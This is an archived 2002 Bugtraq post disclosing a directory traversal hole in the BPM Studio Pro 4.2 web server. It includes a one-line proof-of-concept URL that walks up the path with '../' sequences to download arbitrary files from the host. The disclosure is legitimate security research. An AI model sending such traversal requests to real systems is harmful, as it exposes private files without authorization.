BPM STUDIO PRO 4.2 DIRECTORY ESCAPE VULNERABILITY

From: ][-][UNTER (lopht@tutopia.com)
Date: Wed Feb 27 2002 - 11:02:34 CET


Hi bugtraq again...

Now i' ve found another vulnerability in BPM STUDIO PRO 4.2 http server
implementation.

Anyone can download any file in some host running this software simply like
performing this http request :

 http://BPM-HOST/../../../../autoexec.bat

http server is not activated by default...

byes

-----------------------------------------------
             ][-][UNTER
Infobyte Security Research Crew
      Buenos Aires, Argentina
-----------------------------------------------



This archive was generated by hypermail 2.1.3 : Thu Feb 28 2002 - 02:39:39 CET